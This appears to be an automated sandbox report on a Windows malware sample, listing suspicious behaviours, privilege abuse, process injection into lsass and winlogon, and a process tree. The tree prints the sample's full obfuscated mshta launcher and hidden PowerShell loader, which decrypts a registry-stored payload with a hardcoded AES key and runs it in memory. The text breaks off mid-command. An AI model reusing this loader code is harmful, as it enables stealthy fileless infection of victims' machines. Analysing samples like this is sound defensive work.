\REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 5f090e61d1aada01 svchost.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exepid process 2624 Uni.bat.exe 2624 Uni.bat.exe 2624 Uni.bat.exe 2604 dllhost.exe 2604 dllhost.exe 2452 dllhost.exe 2452 dllhost.exe 2452 dllhost.exe 2452 dllhost.exe 2604 dllhost.exe 2604 dllhost.exe 2624 Uni.bat.exe 2624 Uni.bat.exe 1360 $sxr-powershell.exe 1360 $sxr-powershell.exe 1360 $sxr-powershell.exe 1360 $sxr-powershell.exe 2156 dllhost.exe 2156 dllhost.exe 2156 dllhost.exe 2156 dllhost.exe 4868 dllhost.exe 4868 dllhost.exe 4868 dllhost.exe 4868 dllhost.exe 1360 $sxr-powershell.exe 1360 $sxr-powershell.exe 3900 $sxr-powershell.exe 1360 $sxr-powershell.exe 3552 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3044 dllhost.exe 3044 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3044 dllhost.exe 3044 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3044 dllhost.exe 3044 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3900 $sxr-powershell.exe 3900 $sxr-powershell.exe 3552 dllhost.exe 3552 dllhost.exe 3044 dllhost.exe 3044 dllhost.exe 3552 dllhost.exe 3552 dllhost.exe 3900 $sxr-powershell.exe 3900 $sxr-powershell.exe 3552 dllhost.exe 3552 dllhost.exe 3044 dllhost.exe 3044 dllhost.exe 3552 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3312 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Uni.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exesvchost.exeExplorer.EXEdllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 2624 Uni.bat.exe Token: SeDebugPrivilege 2624 Uni.bat.exe Token: SeDebugPrivilege 2604 dllhost.exe Token: SeDebugPrivilege 2452 dllhost.exe Token: SeDebugPrivilege 1360 $sxr-powershell.exe Token: SeDebugPrivilege 1360 $sxr-powershell.exe Token: SeDebugPrivilege 4868 dllhost.exe Token: SeDebugPrivilege 2156 dllhost.exe Token: SeDebugPrivilege 3900 $sxr-powershell.exe Token: SeDebugPrivilege 1360 $sxr-powershell.exe Token: SeDebugPrivilege 3552 dllhost.exe Token: SeAuditPrivilege 2356 svchost.exe Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeAuditPrivilege 2356 svchost.exe Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeDebugPrivilege 3044 dllhost.exe Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeShutdownPrivilege 3312 Explorer.EXE Token: SeCreatePagefilePrivilege 3312 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2480 svchost.exe Token: SeIncreaseQuotaPrivilege 2480 svchost.exe Token: SeSecurityPrivilege 2480 svchost.exe Token: SeTakeOwnershipPrivilege 2480 svchost.exe Token: SeLoadDriverPrivilege 2480 svchost.exe Token: SeSystemtimePrivilege 2480 svchost.exe Token: SeBackupPrivilege 2480 svchost.exe Token: SeRestorePrivilege 2480 svchost.exe Token: SeShutdownPrivilege 2480 svchost.exe Token: SeSystemEnvironmentPrivilege 2480 svchost.exe Token: SeUndockPrivilege 2480 svchost.exe Token: SeManageVolumePrivilege 2480 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2480 svchost.exe Token: SeIncreaseQuotaPrivilege 2480 svchost.exe Token: SeSecurityPrivilege 2480 svchost.exe Token: SeTakeOwnershipPrivilege 2480 svchost.exe Token: SeLoadDriverPrivilege 2480 svchost.exe Token: SeSystemtimePrivilege 2480 svchost.exe Token: SeBackupPrivilege 2480 svchost.exe Token: SeRestorePrivilege 2480 svchost.exe Token: SeShutdownPrivilege 2480 svchost.exe Token: SeSystemEnvironmentPrivilege 2480 svchost.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXEpid process 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
Explorer.EXEpid process 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
$sxr-powershell.exeExplorer.EXEConhost.exepid process 1360 $sxr-powershell.exe 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 3312 Explorer.EXE 4900 Conhost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exeUni.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exedllhost.exedescription pid process target process PID 2932 wrote to memory of 2624 2932 cmd.exe Uni.bat.exe PID 2932 wrote to memory of 2624 2932 cmd.exe Uni.bat.exe PID 2624 wrote to memory of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2624 wrote to memory of 2452 2624 Uni.bat.exe dllhost.exe PID 2244 wrote to memory of 4660 2244 $sxr-mshta.exe $sxr-cmd.exe PID 2244 wrote to memory of 4660 2244 $sxr-mshta.exe $sxr-cmd.exe PID 4660 wrote to memory of 1360 4660 $sxr-cmd.exe $sxr-powershell.exe PID 4660 wrote to memory of 1360 4660 $sxr-cmd.exe $sxr-powershell.exe PID 1360 wrote to memory of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3112 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3112 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3112 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3900 1360 $sxr-powershell.exe $sxr-powershell.exe PID 1360 wrote to memory of 3900 1360 $sxr-powershell.exe $sxr-powershell.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 wrote to memory of 3552 1360 $sxr-powershell.exe dllhost.exe PID 3552 wrote to memory of 632 3552 dllhost.exe winlogon.exe PID 3552 wrote to memory of 688 3552 dllhost.exe lsass.exe PID 3552 wrote to memory of 996 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 460 3552 dllhost.exe dwm.exe PID 3552 wrote to memory of 720 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 1036 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 1044 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 1100 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 1160 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 1180 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 1212 3552 dllhost.exe svchost.exe PID 3552 wrote to memory of 1324 3552 dllhost.exe svchost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1ef4e76f-b587-4b55-8c97-a2c501568a72}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b248a598-76f8-4679-b0c0-ebcfaf65a8ba}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c6e84c9a-b4b7-4c6b-8f52-e96d28091046}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{35c6c327-8b8b-41fd-95a7-e1585bc8e8b9}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{2cb9cbce-6196-4d8c-aa8e-b1bf5562dba0}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{fa61374d-0cf9-4f46-9a28-a8fffc47feeb}2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{b50dd45c-b3cb-4658-ad0a-30d87db9b509}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4844 -s 3243⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{95890ecf-54f4-4413-bec7-bbadde83b176}2⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5320 -s 3123⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ffd005f7-d39f-4c1f-9223-24e8a618dfd5}2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-jUsBURfHSoufmNeEAjpO4312:&#<?=%3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{1ad686d3-6289-4170-85b2-858f2c56b85a}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{c3d49fa7-52c6-4784-98d1-76949fb3e7b8}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1360).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 